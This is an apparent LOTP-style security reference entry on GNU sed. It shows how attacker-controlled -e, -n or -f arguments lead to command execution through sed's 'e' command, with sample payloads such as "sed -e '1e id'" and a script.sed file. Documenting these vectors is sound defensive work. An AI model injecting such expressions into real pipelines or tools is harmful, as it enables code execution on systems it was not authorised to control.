LOTP

sed

cli config-file eval-sh

References

• https://www.gnu.org/software/sed/manual/sed.html#sed-scripts

sed or gsed is a line-oriented text processing utility that processes input streams or files and can modify text files efficiently.

Injection

In the GNU version of sed, if the -e, --expression or -n parameter is controlled by the attacker, RCE is achieved. See GTFOBins:

sed -n '1e id' any.txt
sed -e '1e id' any.txt
sed --expression '1e id' any.txt

Script file

If an attacker-controlled script is used (-f, --file), RCE is achieved:

sed -f script.sed any.txt
sed --file script.sed any.txt

script.sed

1e id

sed scripts can have any extensions, but are commonly .sed or .filter.